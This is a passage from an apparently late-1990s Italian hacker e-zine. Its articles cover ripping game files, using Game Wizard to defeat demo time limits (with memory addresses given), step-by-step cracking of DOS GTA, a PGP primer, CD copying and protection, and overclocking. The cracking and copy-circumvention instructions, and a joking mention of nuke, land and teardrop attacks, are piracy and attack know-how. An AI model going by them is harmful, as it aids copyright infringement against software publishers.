(ultimamente sproteggere i giochi Š pi— duro di una volta!)


PARTE 2: "RIPPIAMO IL CD?"
Cosa vuol dire "rippare?" be in parole povere, molto povere, vuol dire
eliminare parte dei giochi che sono inutili e che okkupano solo spazio su hard
disk. Quali sono queste parti? Be di solito tutti i maggiori gruppi tendono a
rippare quelli che sono i filmati, le musiche (solo se in formato wav), le
direct x, i demo o i filmati dimostrativi che sono contenuti all'interno dei
cd, i vari linguaggi (di solito si lascia solo l'inglese) ecc.
Una volta rippato il gioco generalmente viene compresso usando programmi tipo
il pkzip o il rar, suddividendolo in vari dischetti da 1.4 mega per una
eventuale archiviazione.
Quando io copio il mio gioco su cd per "craccarlo" gi… posso sin da subito
eliminare le direct x e i vari demo o filmati inclusi nelle subdirectory che
non riguardano il gioco vero e proprio.
Una volta che il gioco sta su hard disk provo inanzitutto a saltare il cd-check
con uno dei modo sopra elencati dopo di che passo a ripparlo. Molti giochi al
loro interno hanno dei menu che consentono di eliminare la musica dal gioco i
filmati, attivando queste opzioni, salvando la configurazione, io potr• gi…
tranquillamente eliminare i filmati e le musiche wav (riconoscerli non Š
difficile, di solito sono contenuti in apposite sottodirectory con nomi tipi
Video, Music, Sound, e poi generalmente okkupano decine di mega).
Se i giochi in questione non presentano tali opzioni al loro interno posso
utilizzare vari sistemi (nel 90% l'opzione musica abilitata/disabilitata Š
presente quindi prendero' in considerazione vari sistemi per rippare i
filmati):
- cancellare i vari file di filmato e provare a lanciare il gioco senza di
questi
- cancellare i filmati e creare dei file di lunghezza 0 con stesso nome e
estensione di quelli reali
- cancellare i vari file, tenere solo quello che okkupa il minor numero di K e
fare varie copie di questo cambiandogli per• nome con quelli dei vari file
che abbiamo cancellato
Stesso discorso pu• valere per le musiche in wav, o i dialoghi presenti
all'interno dei giochi.
Ripeto che comunque molti giochi al loro interno hanno le opzioni per
disabilitare queste cose quindi_
Be credo che sia tutto.
Il gioco lo avete sprotetto, le cose in pi— le avete eliminate, non vi resta
che zippare i vostri giochi_
Vi assicuro che avrete molta soddisfazione.

PARTE 3: USARE IL GAME WIZARD 32 PRO PER SPROTEGGERE I GIOCHI BY CAVALLO

Eh si', sono riuscito a infilarmi anche in questa guida, spero che non
dispiaccia a nessuno !!! Andiamo ad ANAL-izzare :-) il funzionamento del Game
Wizard 32 Pro 3.0, molto utile x poter cheatare con i giochi ma piu' che questo
mi interessa una sua applicazione diciamo piu' cattiva; illustro comunque i
possibili utilizzi del suddetto programma (che per chi non lo sapesse gira
sotto DOS):

GW permette di cercare nella memoria dei particolari valori che ci servono (es.
Munizioni, Vita etc..), settarli al valore che desideriamo, "freezarli" cioe'
bloccarli su un dato valore, salvare frame (immagini) del gioco che ci
interessa, editare manualmente la memoria Ram, salvare la situazione totale
della memoria del gioco che ci interessa cosicche' saremo in grado in futuro di
ritornare nella stessa situazione di gioco (utile per i giochi che non
permettono di salvare la posizione ma ATTENZIONE, se salvate tutta la memoria
per es. 16mega, vi ritroverete un file di dimensioni considerevoli sull' HD!) e
altre cosette tipo un File Manager integrato, la possibilita' di bloccare il PC
con una password antisgamo e di poter crashare al Dos in caso di impasto del
computer (cosa non molto rara...), e infine settare la velocita' dei giochi
(utile con quelli vecchi che sui PC moderni sgheggiano troppo e fanno cagare).

La versione Professional del GW permette di effettuare ricerche in 3 modalita':
Basic / Intermediate / Advance
e su 5 Range di Memoria :
Conventional / 4 Mb / 8 Mb / 16 Mb / Max
Tralasciando i range di memoria (anche se consiglio 4/8 Mb) focalizziamo la
nostra attenzione sulle modalita' che riassumerei cosi' :

Basic : ricerca i valori proprio come li avete messi cioe' se io metto 5 allora
il GW pensa "Cazzo, questo qui vuole proprio il valore 5" e ve lo cerca paro
paro nella memoria (quanta ne avete scelta nel range); questa opzione va bene
per valori fissi come Munizioni, Vite, Cuoricini, Pompini etc...

Intermediate : ricerca i valori "approssimandoli"; diciamo che io lo utilizzo
su base percentuale (non so se si riesca ad usare in altro modo) cioe' il GW,
si' sempre lui, pensa "Miiiii, kisto qui e' nu tipo tosto, se dice 25 e poi 50
e poi 100 intende dire che l'ultimo valore e' circa 4 volte il primo e 2 volte
o' secondo". Consigliato per cercare valori tipo Barra di Energia e simili..

Advance : detto anche dai matematici "metodo Cartesio" : ricerca solo
permanenze e variazioni dello stato mentale di Cavallo, no volevo dire della
memoria permettendo cosi' di andare a cercare le cose piu' disparate (e' un po'
un casino da usare)

"Si ma cazzo non ci hai ancora detto come si usa sto cazz'i'programma.." Ok, un
momento, arrivo al dunque:

Il programma e' un TSR (Terminate & Stay Resident, minchia come sono bravo!!)
cioe' resta residente in memoria aspettando che voi lo chiamate premendo il
tasto \ quello di fianco all' 1 sopra al TAB, la backslash o com'o'cazz'se
chiama. Una volta chiamato scegliete la 1ma opzione, e il tipo di ricerca e
cercate quello che volete, poi ritornate al gioco, lo usate, richiamate il GW e
cercate il valore ancora dicendo che valore ha (nel beginner e nel
intermediate) o se e' cambiato o meno nell' Advance.
Non basta fare questa procedura una volta sola in quanto il GW "filtra" la
memoria volta dopo volta e quindi bisogna iterare la procedura (n-r)^ä volte
(ehm, scherzo, intendo dire un po' di volte) x trovare lo/gli indirizzo/i
esatti.
P.S. Come penso avrete capito piu' avanzate con il livello di "penetrazione
mnemonica" (beg->int->adv) piu' tempo ci vuole a trovare gli indirizzi esatti.

Comunque il programma ha un bel tutor x imparare ad usarlo quindi mi sono gia'
fin troppo rotto le palle di star qui a spiegarvi come funziona il GW.

Ora vi spiego un bell'utilizzo che ho fatto del GW nell'evitare il classico
rompimento di coglioni del giocare con i Demo; prendero' 2 esempi molto simili
(anche xche' lo ho fatto con questi e basta!!): NBA Live '95 e Fifa '97 :
io mi domando e dico : "Ma perche' diavolo devo giocare solo 1 o 2 minuti a un
gioco per provarlo? StoCazzo ! io ci voglio giocare fin quando mi pare !!!"

Infatti Nba Live '95 (lo so un po' vecchietto ma penso si riesca anche con la
97 e magari con la 98) : limite di tempo 2 tempi da 1 minuto (cazzo ma si puo'
uno inizia a giocare e gia' scattano i secondi).
Ma anche Fifa '97 , 1 solo tempo da 2 minuti, che merda e' ?
Ecco quindi che il prode Cavallo parte col suo fido GW32 in sella ad eliminare
le fetide limitazioni :
dopo un inutile tentativo con l'advanced mode sono giunto alla constatazione
che settando una bella ricerchina intermediate ce la si cava con scioltezza:
nel caso di Nba Live basta settare come ricerche il minuto di partenza come 100
(%) a 30 secondi stoppate e mettete 50 (%) e alla fine 0, ripetete un po' di
volte, magari inframezzando con varianti tipo 75(%) o 25(%) rispettivamente a
45 e 15 sec. Smanettando un po' cosi' arriverete ad avere mano a mano sempre
meno indirizzi, quando ve ne restano solo 3-4 potete usare l'opzione per
importarli direttamente (non ricordo come si chiami, e non ho voglia di star
qui a cercarla) nella Table of Memory Locations dove potete cambiare il valore
o freezarlo, io consiglio di salvare la tabella con un nome, farvi un bel batch
file che chiami il gw e poi il demo del gioco, cosi' appena parte la partita
dimostrativa (occhio la partita, non il demo !!) premete il tasto backslash e
andate su table of.. loadate la tabella prefatta e settate il tempo a quello
che volete (non ricordo che base strana usi il gioco, fate un po' di prove).
Lascio ai fidi lettori :-) come esercizio la semplice ricerca dei falli e/o dei
punti delle 2 squadre (non oso pensare se si possa taroccare qcos'altro,
fatemi sapere !!). Per Fifa'97 il discorso e' lo stesso, l'unica cosa che
essendo un gioco di calcio (ma va') il tempo va da 0 a 2:00 quindi dovete
settare 0 a 0:00 e 100 a 2:00 e quindi il taroccos viene piu' smarzo xche' le
alternative sono o bloccare il timer o riportarlo indietro quando volete (e
piu' bello il lavoro con Nba, fidatevi,si setta il tempo all'inizio del tempo e
poi si gioca..)

Visto che sono buono vi do anche gia' gli indirizzi di memoria :

Nba Live '95 Time : BYTE *00232D31
Fifa '97 Time : BYTE *00277784

Per falli o altre cose divertitevi voi (nel senso buono, non e' un invito
all'omosessualita' :-)) !!!

NOTE:
Tutti gli errori di itagliano, tutti gli orrori ortografici, tutte le cazzate
dette nelle Parti 1 e 2 sono copirait del Dr. Slump. Quindi se su questa guida
ritenete che ci siano scritte troppe cazzate o che usando uno dei metodi sopra
elencati fate qualche cazzata, che vi devo dire: STI CAZZI
Bel discorso del cazzo questo no?
Non so se l'illustre Cavallo si associera' con queste note, ma conoscendolo...
Piu' alcolico che mai Dr. Slump
Cavallo De Cavallis
Dr_Slump


ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÈÍCRACKiNGÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄ CRACK PER GRAND THEŸT AUT0 ÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
VERSi0Ni 8 áiT, 24 áiT, 3DŸX

Questo metodo vi permettera' di crackare la versione DOS di GTA.
Cosi' facendo potrete aggirare la protezione del gioco e tenerlo su Hard Disk o
masterizzarlo.

Prima di tutto, procurarsi via Internet i Time Crack per tutte e tre le demo
(basta andare in Altavista e cercare 'Grand Theft Auto' -
www.altavista.digital.com).

* Installate la versione completa di GTA prima di procedere.

1) Scompattate tutti i file contenuti nel file .ZIP del crack 3Dfx, per
maggiori informazioni leggere il readme.txt - e' molto importante.

2) Copiare i file .EXE contenuti nei file .ZIP dei crack 8 e 24 bit nella
sottodirectory \GTADOS. Anche il file DEMOFX.EXE (crack 3dfx) deve trovarsi
in GTA\GTADOS.

3) Ora rinominare i file come segue:

DEMO8.EXE --> GTA8.EXE
DEMO24.EXE --> GTA24.EXE
DEMOFX.EXE --> GTAFX.EXE

4) Prendere il file ENGLISH.FXT contenuto nel crack 3Dfx e spostarlo in
GTA\GTADATA ricoprendo l'originale.

5) Ora avete completato il crack !!!
GTA girera' pensando di essere la demo, ma avra' tutti i dati accessibili
senza limitazioni e girera' senza il cd.

PUCK


ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÈÍMiSCÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄ GUiDA ALLA CRiTT0GRAFiA ÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
A CHiAVE PUááLiCA - I PARTE

1. -=> Intro <=-

Ogni persona che ha a che fare con l'h/p/c/v/a/c - e non solo ;) -
prima o poi si trova necessariamente di fronte alla necessita'
di scambiare informazioni confidenziali con altri o anche semplicemente
di conservare dati in suo possesso in modo che solo lui vi possa accedervi.
Il problema per chi utilizza la crittografia convenzionale e' che di
fronte all'esigenza di inviare informazioni con altri in un canale
definibile insicuro (come e' internet) non si hanno a disposizione
altri canali sicuri (potrebbe essere ad esempio un appuntamento di
persona in un luogo riservato) per comunicare quale e' la parola chiave o
altre informazioni che permettano l'accesso al file crittato.
Grazie a un nuovo metodo introdotto al pubblico (prima era sviluppato soltanto
su commissione da societa' specializzate) da Philip Zimmermann, tale
inconveniente e' stato ovviato.
Zimmermann ha avuto la brillante idea di creare un programma gratuito che
permettesse a tutti di utilizzare un metodo nuovo unito ad una elevata
sicurezza che la lunghezza delle chiavi offre, usando la crittografia a chiave
pubblica. E' questo una dei fattori che hanno contributo alla diffusione
cosi' capillare del noto programma Pretty Good Privacy, chiamato
comunemente PGP.

2. -=> Perche' <=-

Il punto cruciale su cui si basa il pensiero di Zimmermann e' il seguente:
premesso che la privacy e' un diritto dell'uomo che sta alla base delle
societa' tecnologicamente evolute e deve essere tutelato, accade sempre
piu' frequentemente con l'introduzione di nuove tecnologie che tale diritto
non venga riconosciuto; e' indispensabile quindi utilizzare un metodo per
garantire la riservatezza, sia che si utilizzi la crittografia per spedire
gli auguri di buon anno, piuttosto che un manuale su come costruire una
bomba atomica e PGP e' un programma che permette di farlo.
Criminalizzare l'utilizzo di internet abbinato alla crittografia perche'
non controllabile sarebbe come vietare di utilizzare il telefono poiche'
mezzo attraverso il quale e' possibile ad esempio organizzarsi per attivita'
illecite; sta all'utente in ogni caso decidere che uso farne.

3. -=> Come funzia <=-

Il metodo della crittografia a chiave pubblica consiste nella generazione
di due chiavi, una segreta (protetta da password) e una pubblica che contengono
tutte le informazioni necessarie a codificare, firmare, e decodificare i
messaggi o file che dir si voglia.

Questa coppia di chiavi generata pseudocasualmente mediante una funzione di
PGP tramite un algoritmo matematico garantisce che:

* un messaggio codificato con una chiave della coppia puo' essere
decodificato solo con l'altra chiave della stessa coppia
* non e' possibile, data una chiave della coppia, ricavare l'altra

Fatte queste premesse diventa piu' semplice capire le funzioni offerte da PGP.

4. -=> Funzioni e caratteristiche <=-

I vantaggi ottenuti da tale sistema permettono di avere:

* Privacy:
Se User1 vuole inviare un messaggio a User2 lo codifica usando la chiave
pubblica di quest'ultimo. Solo User2, che ha la corrispondente chiave
segreta, e' in grado di decodificare e leggere il messaggio.

* Autenticazione del mittente:
User1 quando codifica il suo messaggio con la propria chiave privata
certifica che il messaggio e' stato scritto proprio da User1, l'unica
a possedere la corrispondente chiave segreta. User1 ha quindi posto la
sua "firma" elettronica sul messaggio.

* Autenticazione del mittente e del messaggio:
E' possible autenticare, oltre al mittente anche il contenuto del messaggio;
User1 effettua un "hashing" del suo messaggio cioe' mediante una funzione
unidirezionale, da un certo messaggio ricava un valore di lunghezza fissa,
detto hash, che viene inserito nel messaggio/file (una sorta di checksum).
Se il messaggio viene alterato, l'hash non corrisponde piu'.
Se , una volta effettuata la decodifica, messaggio ed hash si corrispondono,
si e' sicuri che nessuno dei due e' stato alterato in qualche maniera. In
pratica, la firma elettronica realizzata dal PGP effettua sempre
l'autenticazione sia del mittente sia del messaggio. Essa ha dunque le
stesse funzioni della firma ordinaria su un documento cartaceo.

* Trasmissione della chiave:
Poiche' con la crittografia a chiave pubblica non c'e' il problema della
trasmissione di una chiave per entrambe le funzioni di codifica e decodifica,
ma ce ne sono due separate non si pone il problema di dovere trasmettere in
modo sicuro quella chiave. Ogni utente deve semplicemente tenere al sicuro
la propria chiave segreta, e diffondere liberamente senza alcun problema
la propria chiave pubblica.

5. -=> Cosa fa PGP quando codifica un messaggio <=-

Il PGP utilizza una intera collezione di algoritmi, tra i piu' sicuri
ed internazionalmente conosciuti nel campo della crittografia. Si suppone
quindi di partire da un messaggio che deve essere firmato e codificato prima di
essere spedito. La sequenza delle operazioni che PGP effettua sono :

a) PGP applica l'algoritmo di hashing MD5 per generare l'hash del messaggio,
avente lunghezza fissa pari a 128 bit. L'hash viene attaccato al messaggio.

b) PGP applica l'algoritmo di compressione dati ZIP per comprimere l'insieme
messaggio piu' hash ottenuto in A.

c) PGP applica un algoritmo di generazione numeri casuali per generare una
sequenza di 128 bit casuali.

d) PGP applica l'algoritmo di crittografia convenzionale IDEA per codificare il
messaggio compresso ottenuto in B, usando come chiave ("session key") il
numero casuale generato in C.

e) PGP applica l'algoritmo di crittografia a chiave pubblica RSA per codificare
la session key. Il risultato viene attaccato al messaggio codificato ottenuto
in D.

f) PGP applica l'algoritmo di ASCII Armor Radix-64 per trasformare il messaggio
ottenuto in E in modo che esso contenga solo caratteri ASCII bassi. Questo
algoritmo trasforma ogni gruppo di tre bytes in un gruppo di quattro bytes.

Il messaggio ottenuto in F e' quello finale, che puo' essere inviato per e-mail.
Il destinatario esegue la sequenza inversa di operazioni.

6. -=> Greets <=-

Questa prima parte e' finita...appuntamento quindi alla prossima uscita di BFI.
Se volete chiarimenti, informazioni, o altro scrivetemi a Blinking@mindless.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQB9AzLEjzoAAAEDgMAZEm4vKqllKENI/8g7x8XEaQppZwgobIXGK8hprLMMnEKA
x9b+m0dIIHm1iTzT+E+kO1xsgGIM8GuzNoKYp9vg/FBqkWX652pKALNElN2R9Bfe
XPvZTXcZZWmWCXFkW3CzCD+5BXcB5337YowzUSEABRG0IEJsaW5raW5nIDxibGlu
a2luZ0BtaW5kbGVzcy5jb20+iQCFAwUQM099XOd9+2KMM1EhAQErUAN/ctdkXk7D
ge9i4MV1BBtqXeT0UXNVp0jLONVSndmDBC2m9C+bRLX0ACQ10avUtd0cxIF4BeWS
vIekKu/5uYyCiNyIH+iEi7FUT6nj3cMrTNS0Z5u5gcIehijSzv48ANuiJndYrciH
0tGamijyz73gIQ==
=IyQY
-----END PGP PUBLIC KEY BLOCK-----
Key Finger Print = 53 9E 03 F8 63 9F 40 08 46 9F B8 1C FF 3D A8 BB
Key ID=8C335121
UIN ICQ=3068260

Se invece vi ho fatto solo incazzare potete farmi nuke, land, teardrop
e tutto quello che volete quando sono collegato a internet (moooolto
spesso), perche' tanto ho l'ip statico 127.0.0.1 ma sono sicuro che non
lo farete ;-) !!!
Special GreetZ a tutti i membZ di Soft Project, BeA & DjNoise.
ByeZ.

Blinking


ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÈÍMiSCÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄ CENNi SULLA MASTERiZZAZi0NE ÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

In questo articolo tratteremo i cenni principali sulla masterizzazione:

1) Considerazioni generali
2) Utilizzo delle determinate apparecchiature + miei consigli
3) I cd protetti (cenni preliminari)
4) Protezione dei cd
5) Note sulla manutenzione in generale


1-Considerazioni Generali:

Questo articolo vuole spiegare i fondamenti principali di questa nobile arte
(mica tanto heheh), in quanto molte persone si sono trovate in difficolta'
(booo cavoli loro). Voglio precisare che qui si parla di cdr-w scsi e non di
quelli eide (bello skifoo).
Ma ora passiamo al sodo della questione.........


2-Utilizzo delle Varie Apparecchiature (con i suoi dovuti problemi):

Dopo aver acquistato il vostro cd-w + ovviamente la vostra bene amata
scheda scsi (meglio se pci anche se la isa e' molto piu' stabile),
dovrete controllare diversi parametri per avere una ottima masterizzazione.
Se avete una sola unita' scsi, ovvero solo il masterizzatore, non occorre
eseguire la terminazione dell'unita', mentre se avete anche lettori o hd
scsi occorrera' eseguirla (ora vi spiego meglio !!).
Voglio precisare che su qualunque unita' scsi c'e' un jumper che serve per
eseguire questa maledetta terminazione (che palle !!).
Quindi per farla breve l'unita' da terminare e' sempre l'ultima della catena
scsi, per esempio se il vostro hd scsi e' collegato per ultimo al flat
cable scsi dovra' essere terminato.
Quindi molti problemi di masterizzazione possono essere evitati compiendo
questa semplice operazione :) ....
Certe volte capita di sentire gli amici che dicono "cazzo ho bruciato un cd
porco dio.........." per evitare questi problemi ci sono una marea di piccole
cose da controllare.
La prima che mi viene in mente: molte masterizzazioni si interrompono
per tanti motivi, che spieghero' in seguito, ma uno dei piu' importanti e' la
velocita' del vostro hard disk ovvero il vostro transfer rate.
Io consiglio un hd scsi in quanto possiede una miglior continuita'
nell'afflusso dei dati, mentre uno eide potrebbe procurare alcuni problemi.
Comunque non spaventatevi in quanto molte persone riescono a masterizzare
con gli hd eide.
Quindi se non avete i soldi per prendervi un hd scsi compratevi un eide con una
buona velocita' di trasferimento, ma la cosa piu' importante e' che sia
bufferizzato.
Altra cosa molto importante e' che prima di masterizzare occorre eseguire
un defrag (una deframmentazione) dei file interessati.
Quindi in questo modo eviteremo il solito errore di buffer underun.
Altra cosa molto importante e' di non toccare assolutamente la superfice
del cd vergine e di rimuovere eventuali residui di polvere, in quanto la lente
del lettore potrebbe deteriorarsi irreparabilmente quindi occhio !!!!!
Quando installate la vostra apparecchiatura vi conviene aumentare l'areazione
del vostro pc, installando ventole che funzionino ovviamente a bassa tensione
in quanto la temperatura di lavoro non deve superare i 70 gradi.
Soprattutto non collegate l'alimentazione della ventola su quella del vostro
hd in quanto se essa si spegne anche il vostro hard disk farebbe la stessa
cosa, magari rovinandosi irreparabilmente !!!


3- I CD Protetti (cenni preliminari)

Voglio fare prima una breve premessa: molti pensavano che i cd playstation
fossero protetti, smentisco subito questa stupida leggenda metropolitana:
nessun cd playstation e' protetto (non ho mai avuto problemi nel copiarli).....
Molti affermavano che i playstation avevano una protezione sulle traccie
audio....sono tutte cazzate. Invece e' verissimo che i cd copiati non fungono
sulle play non modificate.........
Le protezioni su cd-rom sono ben altra cosa !!!!!!
Ecco.. ricordo un fatto che mi fece incazzare non poco:
mi era capitato per le mani l'enciclopedia Gedea del valore di 3.000.000 e
rotti, ovviamente cercai subito di copiarla........... Ma il fato volle che
fosse protetta........ Buttai via una marea di cd vergini in quanto mi misi a
fare qualsiasi tipo di prova... Ma il risultato fu vano....
Mi misi a controllare ogni file del cd.... Ne trovai uno di cui non ricordo
bene il nome (non vi deve interessare perche' cambia da cd a cd).... Era
nascosto e tra l'altro non si poteva copiare su nessuna unita', la sua
dimensione era di circa 80 mega se non erro......
Sta di fatto che questo file internamente era vuoto !!!!!!
Quindi se l'enciclopedia veniva installata dal cd originale funzionava
perfettamente. Il perche' e' molto semplice in quanto in lettura il laser non
accedeva minimamente a quel file......
Invece, per esempio durante la copia da cd a cd tramite lettore scsi, la
masterizzazione si bloccava proprio quando si accedeva a quel file.
Feci un'altra prova. Misi questo fottutissimo cd nel masterizzatore per
eseguire una immagine del cd: ogni volta si ripeteva la solita cosa, quando si
arrivava su quel file l'immagine si piantava.....
Questa tecnica di protezione viene chiamata laserlocking...... Questo tipo di
protezione e' fisico, quindi permanente senza possibilita' di sprotezione......
Per ora nessun programma di masterizzazione e' riuscito nella sua opera........
Quindi se vi trovate davanti ad una protezione del genere vi consiglio subito
di lasciar perdere, in quanto buttereste via tempo e denaro....................

4-Protezione dei CD:

Finalmente siamo arrivati al dunque..........
Premetto che la protezione dei cd non e' un argomento facile..... e molto
complesso da mettere in pratica.
Ci sono due sistemi che ritengo fondamentali:

1)Consiste nel creare un file di testo di circa 30-40 mb totalmente vuoto. Mi
spiego meglio: per fare questo cosidetto file possiamo utilizzare il debug del
dos... Dopo averlo creato, dobbiamo munirci di un software dedicato alla
masterizzazione (vi consiglio il gear 4.0 o superiore che, a differenza
dell'easy cd, consente di nascondere i file a nostro piacimento.....).
Dopo aver creato questo file occorre lanciare il prog di masterizzazione,
creare un cd multi sessione e nella prima sessione scrivere un parte dei dati,
poi aprire un'altra sessione e far scrivere il sudetto file txt, dopodiche' far
scrivere i dati rimanenti e chiudere definitivamente la sessione del cd....
In questo caso abbiamo ottenuto un cd protetto..... Ma non simile al
laserlocking............

2)La seconda "teoria che deve essere ancora sperimentata" e' quella di riuscire
a rovinare un file con estensione tmp... in modo da non poterlo copiare sul
nostro hd.. il procedimento e' sempre quello di prima...........utilizzando
sempre il nostro buon gear 4.0 .


5-note sulla manutenzione di un cd-r :

1)Ricordarsi di tenere il vostro cd-r in un ambiente che sia ben ventilato.
2)Pulire sempre la superfice dei vostri cd (sia registrabili che non) in quando
possono sporcare la lente del laser...e dare seri problemi...
3)Installare il vostro cd-r in un luogo privo di vibrazioni.
4)Non collocare l'unita', se esterna, vicino ad una stampante.
5)Togliere il cd prima di spostare l'apparecchiatura.. in questo modo la
testina restera' ben fissata per il trasporto.
6)Non toccare la superfice dei cd in quanto sono privi di protezione.
7)Non eseguire piu' di due masterizzazioni una dietro l'altra.. in quanto
potremmo far surriscaldare l'apparecchio.
8)Avere sentimento.....(il mio primo comandamento vale per tutte le cose in
generale) e se non capite cosa significa chiedetemelo di persona... :))


Anche se quello che ho scritto puo' sembrarvi poco, cio' vi servira' per fare
le vostre prove......
Comunque questo argomento verra' ampliato nella seconda parte dell'articolo che
uscira' nel secondo numero della rivista....

Wrote by hal9000

Per qualsiasi spiegazione e-mail : hal9@cryogen.com

Ciao a tutti !!!!
Hal9000


ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÈÍMiSCÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄ 0VERCL0CK ÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

CONSIDERAZIONI GENERALI:

1)Con questo termine ci si riferisce a quella operazione che forza un
componente elettronico a lavorare a frequenze maggiori da quelle nominali (ma
comunque ampiamente tollerabili). Qualsiasi componente puo' essere spinto al
limite, ma generalmente questa tortura in un PC e' riservata principalmente
alla CPU.

2)Sottoponendo un componente elettronico a tale stress, anche se comunque
tollerabile, si possono avere delle controindicazioni. Per prima cosa la
temperatura del componente aumenta. Cio' e' dovuto al fatto che, se una CPU a
66Mhz in un tempo T1 esegue un numero N1 di operazioni, ad una frequenza
maggiore, diciamo 80Mhz, nel medesimo tempo T1 eseguira' un numero N2 di
operazioni maggiore di N1, quindi produrra' piu' calore, che deve essere in un
qualche modo smaltito, pena pericolosi surriscaldamenti.

Inoltre, spingendo i componenti elettronici oltre i limiti imposti dalla
fisica, si possono infliggere danni irreparabili ai transistor. Questo,
ovviamente, in teoria !

3)A parte il buon senso che puo' evitare di sottoporre il surriscaldamento
della CPU oggetto di overclocking (come in tutte le cose, l'importante e' non
esagerare.... Vedere tabella che segue) ci sono pero' dei piccoli accorgimenti
che possono rendere l'overclocking un'operazione quasi completamente sicura.
La maggioranza delle CPU dei PC monta un dissipatore metallico. L'ideale
sarebbe andare in un negozio di elettronica ed acquistare un dissipatore (delle
dimensioni adeguate!) dall'elevato coefficiente di dissipazione , ma
generalmente quelli per CPU vanno gia' abbastanza bene.

Assolutamente non deve mancare la ventolina.
Inoltre io consiglio vivissimamente di acquistare del grasso di silicone, una
pasta biancastra, e applicarne una patina tra la CPU ed il dissipatore. Infatti
la pasta fa passare il calore molto meglio dello strato d'aria che
inevitabilmente si crea. Questo vale anche per processori Pentium dal package
plastico: appena un po' di pasta sulla parte metallica non guasta mai, anche se
la CPU non funzionera' in overclock.
Dopo alcune previ considerazioni, ora passiamo al sodo dell'argomento..........
hehehehe :)


LE TECNICHE PRINCIPALI

- BUS ISA:

Molti BIOS permettono di impostare la frequenza del BUS ISA e delle periferiche
ad esso collegate. La frequenza standard di 8 Mhz puo' essere aumentata agendo
sui parametri del BIOS. In questo modo tutte le periferiche ISA dovrebbero
lavorare piu' velocemente, ma non aspettatevi miracoli ...anche perche' adesso
come adesso le periferiche ISA piu' critiche sono praticamente inesistenti
(vedi controller e schede video).

- I PROCESSORI 80486:

Queste CPU possono essere overclockate, ma non sempre l'operazione riesce
(subito si capisce: il PC o si blocca o si resetta). Fate molta attenzione ai
486 funzionanti a 5 Volt (come i DX2) ed utilizzate sempre un dissipatore con
ventola sopra la CPU. Un Dx2 a 66 puo' essere portato a 80Mhz impostando il
clock della scheda madre a 40Mhz, mentre un DX4 a 100Mhz potrebbe essere
portato a 120 con il medesimo cambio di clock. Cio' e' dovuto al fatto che i
486DX2 hanno un moltiplicatore interno di frequenza, mentre i DX4 (che per la
cronaca si chiamano solo DX4 e non 80486 DX4 ...) possono essere settati o per
la duplicazione del clock, oppure per la triplicazione. Quindi,

80486 DX2 66Mhz = 33 X 2
80486 DX2 80 Mhz = 40 X 2
DX4 75 Mhz = 25 X 3
DX4 100Mhz = 33 X 3 oppure 50 X 2

Non provate a far funzionare i DX4 a 150Mhz ! Al massimo si possono spingere a
120Mhz.

Ho ricevuto anche richieste di overclock di 486 senza moltiplicatore e/o
triplicatore di clock, come ad esempio i 80486Dx e 80486Sx.

Ovviamente il mio invito e' sempre quello di applicare un dissipatore con
ventola, anche se si porta un 486 da 33 a 40Mhz. In questa affermazione ho un
po' anticipato il tema dell'overclocking. Infatti io consiglio di overclockare
i 486 solamente al "passo" successivo, vale a dire:

da 25 a 33 Mhz
da 33 a 40 Mhz
(potete provare anche a 50, ma prestate molta attenzione alla temperatura
del chip !!)
da 40 a 50 Mhz

Queste operazioni si effettuano cambiando i ponticelli della scheda madre, ma
non tutte le motherboard hanno questa possibilita'. Manuale di istruzione alla
mano, e' da verificare volta per volta.

ATTENZIONE : Non dimenticate di impostare correttamenti gli stati di attesa di
memoria e/o cache per la nuova frequenza. Non e' solo la CPU che puo' far
fallire un overclocking ....


- I PROCESSORI PENTIUM:

Un discorso piu' complesso meritano queste CPU. Esse non dispongono di un
moltiplicatore di frequenza: e' la scheda madre che permette la regolazione del
clock della medesima e del fattore di moltiplicazione. Infatti un P120 e'
ottenuto impostando la scheda madre a 60Mhz ed il fattore di moltiplicazione a
2X ( 60 X 2 = 120 Mhz ).
Un P133 e' ottenuto sempre con fattore 2X ma con motherboard funzionante a
66Mhz (e Bus PCI a 33Mhz, ma questo si adegua automaticamente in base alla
frequenza della scheda madre).

Nota bene: Sono gia' arrivati in Italia i Pentium che non possono essere
overclockati, per meglio dire, supportano SOLO il fattore di moltiplicazione
per il quale sono stati "marchiati". Generalmente sono dei Pentium a 133Mhz,
che anche se vengono spinti a 166Mhz, funzionano e mostrano da BIOS, sempre i
133Mhz.

processore frequenza fattore di X frequenza esterna BUS PCI

P90 90 1.5 60 30
P100 100 1.5 66 33
P120 120 2.0 60 30
P133 133 2.0 66 33
P150 150 2.5 60 30
P166 166 2.5 66 33
